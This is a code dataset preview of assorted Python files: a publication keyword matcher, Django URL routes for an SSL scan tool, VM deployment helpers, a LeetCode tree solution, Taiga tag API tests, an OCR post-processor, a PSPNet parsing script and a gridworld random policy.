Code dataset preview. Schema: max_stars_repo_path (string, 4-286 chars) | max_stars_repo_name (string, 5-119 chars) | max_stars_count (int64, 0-191k) | id (string, 1-7 chars) | content (string, 6-1.03M chars) | content_cleaned (string, 6-1.03M chars) | language (111 classes) | language_score (float64, 0.03-1) | comments (string, 0-556k chars) | edu_score (float64, 0.32-5.03) | edu_int_score (int64, 0-5).

Each record below is listed as max_stars_repo_path | max_stars_repo_name | max_stars_count | id, followed by the file content.
src/main/NLP/STRING_MATCH/scopus_ha_module_match.py | alvinajacquelyn/COMP0016_2 | 0 | 9100

import os, sys, re
import json
import pandas as pd
import pymongo
from main.LOADERS.publication_loader import PublicationLoader
from main.MONGODB_PUSHERS.mongodb_pusher import MongoDbPusher
from main.NLP.PREPROCESSING.preprocessor import Preprocessor
class ScopusStringMatch_HAmodule():
def __init__(self):
self.loader = PublicationLoader()
self.mongodb_pusher = MongoDbPusher()
self.preprocessor = Preprocessor()
def __progress(self, count, total, custom_text, suffix=''):
"""
Visualises progress for a process given a current count and a total count
"""
bar_len = 60
filled_len = int(round(bar_len * count / float(total)))
percents = round(100.0 * count / float(total), 1)
bar = '*' * filled_len + '-' * (bar_len - filled_len)
sys.stdout.write('[%s] %s%s %s %s\r' %(bar, percents, '%', custom_text, suffix))
sys.stdout.flush()
def __read_keywords(self, data: dict) -> None:
"""
Given a set of publications in a dictionary, performs pre-processing for all string type data fields.
        Performs look-up on HA keyword occurrences in a document.
Results are pushed to MongoDB (backed-up in JSON file - scopus_matches.json).
"""
resulting_data = {}
counter = 0
keywords = self.preprocessor.preprocess_keywords("main/HA_KEYWORDS/HA_Keywords.csv")
num_publications = len(data)
num_keywords = len(keywords)
for doi, publication in data.items():
# visualise the progress on a commandline
self.__progress(counter, num_publications, "processing scopus_matches.json")
counter += 1
description = self.preprocessor.tokenize(publication["Description"])
ha_occurences = {} # accumulator for HA Keywords found in a given document
for n in range(num_keywords):
ha_num = n + 1
ha = "HA " + str(ha_num) if ha_num < num_keywords else "Misc" # clean and process the string for documenting occurences
ha_occurences[ha] = {"Word_Found": []}
for keyword in keywords[n]:
if keyword in description:
ha_occurences[ha]["Word_Found"].append(keyword)
if len(ha_occurences[ha]["Word_Found"]) == 0:
ha_occurences.pop(ha, None) # clear out empty occurences
resulting_data[doi] = {"DOI": doi, "Related_HA": ha_occurences}
print()
self.mongodb_pusher.matched_scopus(resulting_data) # push the processed data to MongoDB
print()
# Record the same data locally, acts as a backup
with open('main/NLP/STRING_MATCH/HA_MODULE_RESULTS/scopus_matches_modules.json', 'w') as outfile:
json.dump(resulting_data, outfile)
def run(self):
"""
        Controller method for this class.
        Loads publications from a pre-loaded pickle file.
"""
data = self.loader.load_all()
        self.__read_keywords(data)
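
# Illustrative sketch (not part of the original file): the matching step above tokenizes
# a publication description and records which keywords of each "HA" group occur in it,
# labelling the last group "Misc". The toy keyword groups and description below are
# hypothetical stand-ins for the CSV-driven data the class actually loads.
toy_keywords = [["cancer", "oncology"], ["diabetes"], ["misc", "other"]]
toy_description = "a study of diabetes and oncology outcomes".split()
toy_matches = {}
for n, group in enumerate(toy_keywords):
    label = "HA " + str(n + 1) if n + 1 < len(toy_keywords) else "Misc"
    found = [kw for kw in group if kw in toy_description]
    if found:
        toy_matches[label] = {"Word_Found": found}
print(toy_matches)  # {'HA 1': {'Word_Found': ['oncology']}, 'HA 2': {'Word_Found': ['diabetes']}}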
tools/urls.py | Cyberdeep/archerysec | 0 | 9101

# _
# /\ | |
# / \ _ __ ___| |__ ___ _ __ _ _
# / /\ \ | '__/ __| '_ \ / _ \ '__| | | |
# / ____ \| | | (__| | | | __/ | | |_| |
# /_/ \_\_| \___|_| |_|\___|_| \__, |
# __/ |
# |___/
# Copyright (C) 2017-2018 ArcherySec
# This file is part of ArcherySec Project.
from django.conf.urls import url
from tools import views
app_name = 'tools'
urlpatterns = [
url(r'^sslscan/$',
views.sslscan,
name='sslscan'),
url(r'^sslscan_result/$',
views.sslscan_result,
name='sslscan_result'),
]
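
# Illustrative sketch (not part of the original file): with app_name = 'tools', the two
# routes are reversible by namespaced name, assuming the project's root URLconf includes
# this module (e.g. under a 'tools/' prefix); the resulting paths depend on that include.
from django.urls import reverse

sslscan_url = reverse('tools:sslscan')
sslscan_result_url = reverse('tools:sslscan_result')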
api/vm/base/utils.py | erigones/esdc-ce | 97 | 9102

from core.celery.config import ERIGONES_TASK_USER
from que.tasks import execute, get_task_logger
from vms.models import SnapshotDefine, Snapshot, BackupDefine, Backup, IPAddress
logger = get_task_logger(__name__)
def is_vm_missing(vm, msg):
"""
Check failed command output and return True if VM is not on compute node.
"""
check_str = vm.hostname + ': No such zone configured'
return check_str in msg
def vm_delete_snapshots_of_removed_disks(vm):
"""
This helper function deletes snapshots for VM with changing disk IDs. Bug #chili-363
++ Bug #chili-220 - removing snapshot and backup definitions for removed disks.
"""
removed_disk_ids = [Snapshot.get_real_disk_id(i) for i in vm.create_json_update_disks().get('remove_disks', [])]
if removed_disk_ids:
Snapshot.objects.filter(vm=vm, disk_id__in=removed_disk_ids).delete()
SnapshotDefine.objects.filter(vm=vm, disk_id__in=removed_disk_ids).delete()
Backup.objects.filter(vm=vm, disk_id__in=removed_disk_ids, last=True).update(last=False)
BackupDefine.objects.filter(vm=vm, disk_id__in=removed_disk_ids).delete()
return removed_disk_ids
def _reset_allowed_ip_usage(vm, ip):
"""Helper function used below. It sets the IP usage back to VM [1] only if other VMs, which use the address in
allowed_ips are in notcreated state."""
if all(other_vm.is_notcreated() for other_vm in ip.vms.exclude(uuid=vm.uuid)):
ip.usage = IPAddress.VM
ip.save()
def _is_ip_ok(ip_queryset, vm_ip, vm_network_uuid):
"""Helper function used below. Return True if vm_ip (string) is "dhcp" or is found in the IPAddress queryset
and has the expected usage flag and subnet uuid."""
if vm_ip == 'dhcp':
return True
return any(ip.ip == vm_ip and ip.subnet.uuid == vm_network_uuid and ip.usage == IPAddress.VM_REAL
for ip in ip_queryset)
def vm_update_ipaddress_usage(vm):
"""
This helper function is responsible for updating IPAddress.usage and IPAddress.vm of server IPs (#chili-615,1029),
    by removing association from IPs that are not set on any NIC, and:
- when a VM is deleted all IP usages are set to IPAddress.VM (in DB) and
- when a VM is created or updated all IP usages are set to IPAddress.VM_REAL (on hypervisor) and
Always call this function _only_ after vm.json_active is synced with vm.json!!!
    In order to properly understand this code you have to understand the association between an IPAddress and Vm model.
This function may raise a ValueError if the VM and IP address were not properly associated (e.g. via vm_define_nic).
"""
current_ips = set(vm.json_active_get_ips(primary_ips=True, allowed_ips=False))
current_ips.update(vm.json_get_ips(primary_ips=True, allowed_ips=False))
current_allowed_ips = set(vm.json_active_get_ips(primary_ips=False, allowed_ips=True))
current_allowed_ips.update(vm.json_get_ips(primary_ips=False, allowed_ips=True))
# Return old IPs back to IP pool, so they can be used again
vm.ipaddress_set.exclude(ip__in=current_ips).update(vm=None, usage=IPAddress.VM)
# Remove association of removed vm.allowed_ips
for ip in vm.allowed_ips.exclude(ip__in=current_allowed_ips):
ip.vms.remove(vm)
_reset_allowed_ip_usage(vm, ip)
if vm.is_notcreated():
# Server was deleted from hypervisor
vm.ipaddress_set.filter(usage=IPAddress.VM_REAL).update(usage=IPAddress.VM)
for ip in vm.allowed_ips.filter(usage=IPAddress.VM_REAL):
_reset_allowed_ip_usage(vm, ip)
return
# Server was updated or created
vm.ipaddress_set.filter(usage=IPAddress.VM).update(usage=IPAddress.VM_REAL)
vm.allowed_ips.filter(usage=IPAddress.VM).update(usage=IPAddress.VM_REAL)
# The VM configuration may be changed directly on the hypervisor, thus the VM could have
# new NICs and IP addresses which configuration bypassed our API - issue #168.
vm_ips = vm.ipaddress_set.select_related('subnet').filter(usage=IPAddress.VM_REAL)
vm_allowed_ips = vm.allowed_ips.select_related('subnet').filter(usage=IPAddress.VM_REAL)
# For issue #168 we have to check the VM<->IPAddress association in a loop for each NIC, because we need to
# match the NIC.network_uuid with a Subnet.
for nic_id, nic in enumerate(vm.json_active_get_nics(), 1):
network_uuid = nic.get('network_uuid', None)
if network_uuid:
ip = nic.get('ip', '')
allowed_ips = nic.get('allowed_ips', [])
if ip:
logger.debug('VM: %s | NIC ID: %s | NIC network: %s | IP address: %s', vm, nic_id, network_uuid, ip)
if not _is_ip_ok(vm_ips, ip, network_uuid):
raise ValueError('VM %s NIC ID %s IP address %s is not properly associated with VM!' %
(vm, nic_id, ip))
for ip in allowed_ips:
logger.debug('VM: %s | NIC ID: %s | NIC network: %s | IP address: %s', vm, nic_id, network_uuid, ip)
if not _is_ip_ok(vm_allowed_ips, ip, network_uuid):
raise ValueError('VM %s NIC ID %s allowed IP address %s is not properly associated with VM!' %
(vm, nic_id, ip))
else:
raise ValueError('VM %s NIC ID %s does not have a network uuid!' % (vm, nic_id))
def vm_deploy(vm, force_stop=False):
"""
Internal API call used for finishing VM deploy;
Actually cleaning the json and starting the VM.
"""
if force_stop: # VM is running without OS -> stop
cmd = 'vmadm stop %s -F >/dev/null 2>/dev/null; vmadm get %s 2>/dev/null' % (vm.uuid, vm.uuid)
else: # VM is stopped and deployed -> start
cmd = 'vmadm start %s >/dev/null 2>/dev/null; vmadm get %s 2>/dev/null' % (vm.uuid, vm.uuid)
msg = 'Deploy server'
lock = 'vmadm deploy ' + vm.uuid
meta = {
'output': {
'returncode': 'returncode',
'stderr': 'message',
'stdout': 'json'
},
'replace_stderr': ((vm.uuid, vm.hostname),),
'msg': msg, 'vm_uuid': vm.uuid
}
callback = ('api.vm.base.tasks.vm_deploy_cb', {'vm_uuid': vm.uuid})
return execute(ERIGONES_TASK_USER, None, cmd, meta=meta, lock=lock, callback=callback,
queue=vm.node.fast_queue, nolog=True, ping_worker=False, check_user_tasks=False)
def vm_reset(vm):
"""
Internal API call used for VM reboots in emergency situations.
"""
cmd = 'vmadm stop %s -F; vmadm start %s' % (vm.uuid, vm.uuid)
return execute(ERIGONES_TASK_USER, None, cmd, callback=False, queue=vm.node.fast_queue, nolog=True,
check_user_tasks=False)
def vm_update(vm):
"""
Internal API used for updating VM if there were changes in json detected.
"""
logger.info('Running PUT vm_manage(%s), because something (vnc port?) has changed', vm)
from api.vm.base.views import vm_manage
from api.utils.request import get_dummy_request
from api.utils.views import call_api_view
request = get_dummy_request(vm.dc, method='PUT', system_user=True)
res = call_api_view(request, 'PUT', vm_manage, vm.hostname)
if res.status_code == 201:
logger.warn('PUT vm_manage(%s) was successful: %s', vm, res.data)
else:
        logger.error('PUT vm_manage(%s) failed: %s (%s): %s', vm, res.status_code, res.status_text, res.data)
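
# Illustrative sketch (not part of the original file): _is_ip_ok() accepts the literal
# string "dhcp"; otherwise it requires an IP row with a matching address, subnet uuid and
# the VM_REAL usage flag. The namedtuple stand-ins below are hypothetical; the real helper
# works with Django model instances from the querysets above.
from collections import namedtuple

ToySubnet = namedtuple('ToySubnet', 'uuid')
ToyIP = namedtuple('ToyIP', 'ip subnet usage')
TOY_VM_REAL = 2  # stand-in value for IPAddress.VM_REAL

def toy_is_ip_ok(ip_queryset, vm_ip, vm_network_uuid):
    if vm_ip == 'dhcp':
        return True
    return any(ip.ip == vm_ip and ip.subnet.uuid == vm_network_uuid and ip.usage == TOY_VM_REAL
               for ip in ip_queryset)

toy_ips = [ToyIP('10.0.0.5', ToySubnet('net-1'), TOY_VM_REAL)]
assert toy_is_ip_ok(toy_ips, 'dhcp', 'net-1')
assert toy_is_ip_ok(toy_ips, '10.0.0.5', 'net-1')
assert not toy_is_ip_ok(toy_ips, '10.0.0.6', 'net-1')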
993_Cousins-in-Binary-Tree.py | Coalin/Daily-LeetCode-Exercise | 3 | 9103

# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution:
def isCousins(self, root: TreeNode, x: int, y: int) -> bool:
x_depth = None
x_parent = None
x_found = 0
y_depth = None
y_parent = None
y_found = 0
def dfs(node, parent, depth):
nonlocal x_depth, x_parent, x_found, y_depth, y_found, y_parent
if not node:
return
if node.val == x:
x_depth = depth
x_parent = parent
x_found = 1
elif node.val == y:
y_depth = depth
y_parent = parent
y_found = 1
if x_found and y_found:
return
dfs(node.left, node, depth+1)
if x_found and y_found:
return
dfs(node.right, node, depth+1)
dfs(root, None, 0)
        return x_depth == y_depth and x_parent != y_parent
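
# Illustrative usage sketch (not part of the original file), assuming the commented-out
# TreeNode definition above is available (LeetCode provides it at runtime). The tree
# [1, 2, 3, None, 4, None, 5] comes from the LeetCode 993 examples: nodes 4 and 5 sit at
# the same depth under different parents, so they are cousins; 2 and 3 share a parent.
root = TreeNode(1, TreeNode(2, None, TreeNode(4)), TreeNode(3, None, TreeNode(5)))
assert Solution().isCousins(root, 4, 5)
assert not Solution().isCousins(root, 2, 3)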
docker-images/taigav2/taiga-back/tests/integration/test_tasks_tags.py | mattcongy/itshop | 1 | 9104

# -*- coding: utf-8 -*-
# Copyright (C) 2014-2016 <NAME> <<EMAIL>>
# Copyright (C) 2014-2016 <NAME> <<EMAIL>>
# Copyright (C) 2014-2016 <NAME> <<EMAIL>>
# Copyright (C) 2014-2016 <NAME> <<EMAIL>>
# Copyright (C) 2014-2016 <NAME> <<EMAIL>>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from unittest import mock
from collections import OrderedDict
from django.core.urlresolvers import reverse
from taiga.base.utils import json
from .. import factories as f
import pytest
pytestmark = pytest.mark.django_db
def test_api_task_add_new_tags_with_error(client):
project = f.ProjectFactory.create()
task = f.create_task(project=project, status__project=project, milestone=None, user_story=None)
f.MembershipFactory.create(project=project, user=task.owner, is_admin=True)
url = reverse("tasks-detail", kwargs={"pk": task.pk})
data = {
"tags": [],
"version": task.version
}
client.login(task.owner)
data["tags"] = [1]
response = client.json.patch(url, json.dumps(data))
assert response.status_code == 400, response.data
assert "tags" in response.data
data["tags"] = [["back"]]
response = client.json.patch(url, json.dumps(data))
assert response.status_code == 400, response.data
assert "tags" in response.data
data["tags"] = [["back", "#cccc"]]
response = client.json.patch(url, json.dumps(data))
assert response.status_code == 400, response.data
assert "tags" in response.data
data["tags"] = [[1, "#ccc"]]
response = client.json.patch(url, json.dumps(data))
assert response.status_code == 400, response.data
assert "tags" in response.data
def test_api_task_add_new_tags_without_colors(client):
project = f.ProjectFactory.create()
task = f.create_task(project=project, status__project=project, milestone=None, user_story=None)
f.MembershipFactory.create(project=project, user=task.owner, is_admin=True)
url = reverse("tasks-detail", kwargs={"pk": task.pk})
data = {
"tags": [
["back", None],
["front", None],
["ux", None]
],
"version": task.version
}
client.login(task.owner)
response = client.json.patch(url, json.dumps(data))
assert response.status_code == 200, response.data
tags_colors = OrderedDict(project.tags_colors)
assert not tags_colors.keys()
project.refresh_from_db()
tags_colors = OrderedDict(project.tags_colors)
assert "back" in tags_colors and "front" in tags_colors and "ux" in tags_colors
def test_api_task_add_new_tags_with_colors(client):
project = f.ProjectFactory.create()
task = f.create_task(project=project, status__project=project, milestone=None, user_story=None)
f.MembershipFactory.create(project=project, user=task.owner, is_admin=True)
url = reverse("tasks-detail", kwargs={"pk": task.pk})
data = {
"tags": [
["back", "#fff8e7"],
["front", None],
["ux", "#fabada"]
],
"version": task.version
}
client.login(task.owner)
response = client.json.patch(url, json.dumps(data))
assert response.status_code == 200, response.data
tags_colors = OrderedDict(project.tags_colors)
assert not tags_colors.keys()
project.refresh_from_db()
tags_colors = OrderedDict(project.tags_colors)
assert "back" in tags_colors and "front" in tags_colors and "ux" in tags_colors
assert tags_colors["back"] == "#fff8e7"
assert tags_colors["ux"] == "#fabada"
def test_api_create_new_task_with_tags(client):
project = f.ProjectFactory.create(tags_colors=[["front", "#aaaaaa"], ["ux", "#fabada"]])
status = f.TaskStatusFactory.create(project=project)
project.default_task_status = status
project.save()
f.MembershipFactory.create(project=project, user=project.owner, is_admin=True)
url = reverse("tasks-list")
data = {
"subject": "Test user story",
"project": project.id,
"tags": [
["back", "#fff8e7"],
["front", "#bbbbbb"],
["ux", None]
]
}
client.login(project.owner)
response = client.json.post(url, json.dumps(data))
assert response.status_code == 201, response.data
task_tags_colors = OrderedDict(response.data["tags"])
assert task_tags_colors["back"] == "#fff8e7"
assert task_tags_colors["front"] == "#aaaaaa"
assert task_tags_colors["ux"] == "#fabada"
tags_colors = OrderedDict(project.tags_colors)
project.refresh_from_db()
tags_colors = OrderedDict(project.tags_colors)
assert tags_colors["back"] == "#fff8e7"
assert tags_colors["ux"] == "#fabada"
assert tags_colors["front"] == "#aaaaaa"
| # -*- coding: utf-8 -*-
# Copyright (C) 2014-2016 <NAME> <<EMAIL>>
# Copyright (C) 2014-2016 <NAME> <<EMAIL>>
# Copyright (C) 2014-2016 <NAME> <<EMAIL>>
# Copyright (C) 2014-2016 <NAME> <<EMAIL>>
# Copyright (C) 2014-2016 <NAME> <<EMAIL>>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from unittest import mock
from collections import OrderedDict
from django.core.urlresolvers import reverse
from taiga.base.utils import json
from .. import factories as f
import pytest
pytestmark = pytest.mark.django_db
def test_api_task_add_new_tags_with_error(client):
project = f.ProjectFactory.create()
task = f.create_task(project=project, status__project=project, milestone=None, user_story=None)
f.MembershipFactory.create(project=project, user=task.owner, is_admin=True)
url = reverse("tasks-detail", kwargs={"pk": task.pk})
data = {
"tags": [],
"version": task.version
}
client.login(task.owner)
data["tags"] = [1]
response = client.json.patch(url, json.dumps(data))
assert response.status_code == 400, response.data
assert "tags" in response.data
data["tags"] = [["back"]]
response = client.json.patch(url, json.dumps(data))
assert response.status_code == 400, response.data
assert "tags" in response.data
data["tags"] = [["back", "#cccc"]]
response = client.json.patch(url, json.dumps(data))
assert response.status_code == 400, response.data
assert "tags" in response.data
data["tags"] = [[1, "#ccc"]]
response = client.json.patch(url, json.dumps(data))
assert response.status_code == 400, response.data
assert "tags" in response.data
def test_api_task_add_new_tags_without_colors(client):
project = f.ProjectFactory.create()
task = f.create_task(project=project, status__project=project, milestone=None, user_story=None)
f.MembershipFactory.create(project=project, user=task.owner, is_admin=True)
url = reverse("tasks-detail", kwargs={"pk": task.pk})
data = {
"tags": [
["back", None],
["front", None],
["ux", None]
],
"version": task.version
}
client.login(task.owner)
response = client.json.patch(url, json.dumps(data))
assert response.status_code == 200, response.data
tags_colors = OrderedDict(project.tags_colors)
assert not tags_colors.keys()
project.refresh_from_db()
tags_colors = OrderedDict(project.tags_colors)
assert "back" in tags_colors and "front" in tags_colors and "ux" in tags_colors
def test_api_task_add_new_tags_with_colors(client):
project = f.ProjectFactory.create()
task = f.create_task(project=project, status__project=project, milestone=None, user_story=None)
f.MembershipFactory.create(project=project, user=task.owner, is_admin=True)
url = reverse("tasks-detail", kwargs={"pk": task.pk})
data = {
"tags": [
["back", "#fff8e7"],
["front", None],
["ux", "#fabada"]
],
"version": task.version
}
client.login(task.owner)
response = client.json.patch(url, json.dumps(data))
assert response.status_code == 200, response.data
tags_colors = OrderedDict(project.tags_colors)
assert not tags_colors.keys()
project.refresh_from_db()
tags_colors = OrderedDict(project.tags_colors)
assert "back" in tags_colors and "front" in tags_colors and "ux" in tags_colors
assert tags_colors["back"] == "#fff8e7"
assert tags_colors["ux"] == "#fabada"
def test_api_create_new_task_with_tags(client):
project = f.ProjectFactory.create(tags_colors=[["front", "#aaaaaa"], ["ux", "#fabada"]])
status = f.TaskStatusFactory.create(project=project)
project.default_task_status = status
project.save()
f.MembershipFactory.create(project=project, user=project.owner, is_admin=True)
url = reverse("tasks-list")
data = {
"subject": "Test user story",
"project": project.id,
"tags": [
["back", "#fff8e7"],
["front", "#bbbbbb"],
["ux", None]
]
}
client.login(project.owner)
response = client.json.post(url, json.dumps(data))
assert response.status_code == 201, response.data
task_tags_colors = OrderedDict(response.data["tags"])
assert task_tags_colors["back"] == "#fff8e7"
assert task_tags_colors["front"] == "#aaaaaa"
assert task_tags_colors["ux"] == "#fabada"
tags_colors = OrderedDict(project.tags_colors)
project.refresh_from_db()
tags_colors = OrderedDict(project.tags_colors)
assert tags_colors["back"] == "#fff8e7"
assert tags_colors["ux"] == "#fabada"
assert tags_colors["front"] == "#aaaaaa"
| en | 0.77976 | # -*- coding: utf-8 -*- # Copyright (C) 2014-2016 <NAME> <<EMAIL>> # Copyright (C) 2014-2016 <NAME> <<EMAIL>> # Copyright (C) 2014-2016 <NAME> <<EMAIL>> # Copyright (C) 2014-2016 <NAME> <<EMAIL>> # Copyright (C) 2014-2016 <NAME> <<EMAIL>> # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. | 2.04193 | 2 |
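
# Illustrative sketch (not part of the original file): both the request payloads and
# project.tags_colors above use a list of [tag, color] pairs, where color may be None;
# the tests wrap that list in OrderedDict to look colours up by tag name.
from collections import OrderedDict

toy_payload_tags = [["back", "#fff8e7"], ["front", None], ["ux", "#fabada"]]
toy_tags_colors = OrderedDict(toy_payload_tags)
assert toy_tags_colors["back"] == "#fff8e7"
assert toy_tags_colors["front"] is None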
pytorchocr/postprocess/cls_postprocess.py | satchelwu/PaddleOCR2Pytorch | 3 | 9105

import torch
class ClsPostProcess(object):
""" Convert between text-label and text-index """
def __init__(self, label_list, **kwargs):
super(ClsPostProcess, self).__init__()
self.label_list = label_list
def __call__(self, preds, label=None, *args, **kwargs):
if isinstance(preds, torch.Tensor):
preds = preds.numpy()
pred_idxs = preds.argmax(axis=1)
decode_out = [(self.label_list[idx], preds[i, idx])
for i, idx in enumerate(pred_idxs)]
if label is None:
return decode_out
label = [(self.label_list[idx], 1.0) for idx in label]
        return decode_out, label
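
# Illustrative usage sketch (not part of the original file): decode a toy batch of
# classifier outputs. The label list and score values below are hypothetical.
import torch

toy_post_process = ClsPostProcess(label_list=['0', '180'])
toy_preds = torch.tensor([[0.9, 0.1],
                          [0.2, 0.8]])
print(toy_post_process(toy_preds))  # [('0', 0.9), ('180', 0.8)]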
inference_folder.py | aba-ai-learning/Single-Human-Parsing-LIP | 0 | 9106

#!/usr/local/bin/python3
# -*- coding: utf-8 -*-
import os
import argparse
import logging
import numpy as np
from PIL import Image
import matplotlib
import matplotlib.pyplot as plt
import torch
import torch.nn as nn
from torchvision import transforms
import cv2
import tqdm
from net.pspnet import PSPNet
models = {
'squeezenet': lambda: PSPNet(sizes=(1, 2, 3, 6), psp_size=512, deep_features_size=256, backend='squeezenet'),
'densenet': lambda: PSPNet(sizes=(1, 2, 3, 6), psp_size=1024, deep_features_size=512, backend='densenet'),
'resnet18': lambda: PSPNet(sizes=(1, 2, 3, 6), psp_size=512, deep_features_size=256, backend='resnet18'),
'resnet34': lambda: PSPNet(sizes=(1, 2, 3, 6), psp_size=512, deep_features_size=256, backend='resnet34'),
'resnet50': lambda: PSPNet(sizes=(1, 2, 3, 6), psp_size=2048, deep_features_size=1024, backend='resnet50'),
'resnet101': lambda: PSPNet(sizes=(1, 2, 3, 6), psp_size=2048, deep_features_size=1024, backend='resnet101'),
'resnet152': lambda: PSPNet(sizes=(1, 2, 3, 6), psp_size=2048, deep_features_size=1024, backend='resnet152')
}
parser = argparse.ArgumentParser(description="Pyramid Scene Parsing Network")
parser.add_argument('--models-path', type=str, default='./checkpoints',
help='Path for storing model snapshots')
parser.add_argument('--backend', type=str,
default='densenet', help='Feature extractor')
parser.add_argument('--num-classes', type=int,
default=20, help="Number of classes.")
args = parser.parse_args()
def build_network(snapshot, backend):
epoch = 0
backend = backend.lower()
net = models[backend]()
net = nn.DataParallel(net)
if snapshot is not None:
_, epoch = os.path.basename(snapshot).split('_')
if not epoch == 'last':
epoch = int(epoch)
net.load_state_dict(torch.load(
snapshot, map_location=torch.device('cpu')))
logging.info(
"Snapshot for epoch {} loaded from {}".format(epoch, snapshot))
if torch.cuda.is_available():
net = net.cuda()
return net, epoch
def get_transform():
transform_image_list = [
# transforms.Resize((192, 256), 3),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]),
]
return transforms.Compose(transform_image_list)
def show_image(img, pred):
fig, axes = plt.subplots(1, 2)
ax0, ax1 = axes
ax0.get_xaxis().set_ticks([])
ax0.get_yaxis().set_ticks([])
ax1.get_xaxis().set_ticks([])
ax1.get_yaxis().set_ticks([])
classes = np.array(('Background', # always index 0
'Hat', 'Hair', 'Glove', 'Sunglasses',
'UpperClothes', 'Dress', 'Coat', 'Socks',
'Pants', 'Jumpsuits', 'Scarf', 'Skirt',
'Face', 'Left-arm', 'Right-arm', 'Left-leg',
'Right-leg', 'Left-shoe', 'Right-shoe',))
colormap = [(0, 0, 0),
(1, 0.25, 0), (0, 0.25, 0), (0.5, 0, 0.25), (1, 1, 1),
(1, 0.75, 0), (0, 0, 0.5), (0.5, 0.25, 0), (0.75, 0, 0.25),
(1, 0, 0.25), (0, 0.5, 0), (0.5, 0.5, 0), (0.25, 0, 0.5),
(1, 0, 0.75), (0, 0.5, 0.5), (0.25, 0.5, 0.5), (1, 0, 0),
(1, 0.25, 0), (0, 0.75, 0), (0.5, 0.75, 0), ]
cmap = matplotlib.colors.ListedColormap(colormap)
bounds = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10,
11, 12, 13, 14, 15, 16, 17, 18, 19, 20]
norm = matplotlib.colors.BoundaryNorm(bounds, cmap.N)
h, w, _ = pred.shape
def denormalize(img, mean, std):
c, _, _ = img.shape
for idx in range(c):
img[idx, :, :] = img[idx, :, :] * std[idx] + mean[idx]
return img
img = denormalize(img.cpu().numpy(), [0.485, 0.456, 0.406], [
0.229, 0.224, 0.225])
img = img.transpose(1, 2, 0).reshape((h, w, 3))
pred = pred.reshape((h, w))
# show image
ax0.set_title('img')
ax0.imshow(img)
ax1.set_title('pred')
mappable = ax1.imshow(pred, cmap=cmap, norm=norm)
# colorbar legend
cbar = plt.colorbar(mappable, ax=axes, shrink=0.7, )
cbar.ax.get_yaxis().set_ticks([])
for j, lab in enumerate(classes):
cbar.ax.text(2.3, (j + 0.45) / 20.0, lab, ha='left', va='center', )
plt.savefig(fname="./result.jpg")
print('result saved to ./result.jpg')
plt.show()
def main():
# --------------- model --------------- #
snapshot = os.path.join(args.models_path, args.backend, 'PSPNet_last')
net, starting_epoch = build_network(snapshot, args.backend)
net.eval()
# ------------ load image ------------ #
data_transform = get_transform()
imgfolder = 'ACGPN/ACGPN_testdata/test_img/'
savefolder = 'ACGPN/ACGPN_testdata/test_humanparse/'
if not os.path.exists(savefolder):
os.mkdir(savefolder)
imglist = os.listdir(imgfolder)
for imgname in tqdm.tqdm(imglist):
imgpath = os.path.join(imgfolder, imgname)
print(imgpath)
img = Image.open(imgpath)
img = data_transform(img)
if torch.cuda.is_available():
img = img.cuda()
with torch.no_grad():
pred, _ = net(img.unsqueeze(dim=0))
pred = pred.squeeze(dim=0)
pred = pred.cpu().numpy().transpose(1, 2, 0)
pred = np.asarray(np.argmax(pred, axis=2),
dtype=np.uint8).reshape((256, 192, 1))
pred_3 = np.repeat(pred, 3, axis = 2)
savepath = os.path.join(savefolder, imgname)
cv2.imwrite(savepath, pred_3)
if __name__ == '__main__':
    main()
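
# Illustrative sketch (not part of the original file): the post-processing step in main()
# reduces a (H, W, num_classes) score map to per-pixel class ids and repeats them into a
# 3-channel image so cv2.imwrite can save it. Toy shapes below mirror the 256x192 output.
import numpy as np

toy_h, toy_w, toy_classes = 256, 192, 20
toy_scores = np.random.rand(toy_h, toy_w, toy_classes)
toy_mask = np.asarray(np.argmax(toy_scores, axis=2), dtype=np.uint8).reshape((toy_h, toy_w, 1))
toy_mask_3ch = np.repeat(toy_mask, 3, axis=2)
print(toy_mask_3ch.shape)  # (256, 192, 3)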
src/random_policy.py | shuvoxcd01/Policy-Evaluation | 0 | 9107

from src.gridworld_mdp import GridWorld
class EquiprobableRandomPolicy:
def __init__(self):
self.world_model = GridWorld()
def get_prob(self, selected_action, state):
assert state in self.world_model.states
assert selected_action in self.world_model.actions
num_all_possible_actions = 0
times_selected_action_chosen = 0
for next_state in self.world_model.states:
for action in self.world_model.actions:
if self.world_model.reward_fn(state, action, next_state) == -1:
num_all_possible_actions += 1
if action == selected_action:
times_selected_action_chosen += 1
if not num_all_possible_actions:
return 0
prob = times_selected_action_chosen / num_all_possible_actions
        return prob
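
# Illustrative usage sketch (not part of the original file): get_prob() counts every
# (next_state, action) pair whose reward is -1 as possible and returns the share taken by
# the selected action. The stub world below is a hypothetical stand-in for the project's
# GridWorld; __new__ is used to bypass __init__, which would build the real world model.
class StubGridWorld:
    states = [0, 1]
    actions = ['up', 'down', 'left', 'right']

    def reward_fn(self, state, action, next_state):
        return -1  # every transition counts as possible in this stub

toy_policy = EquiprobableRandomPolicy.__new__(EquiprobableRandomPolicy)
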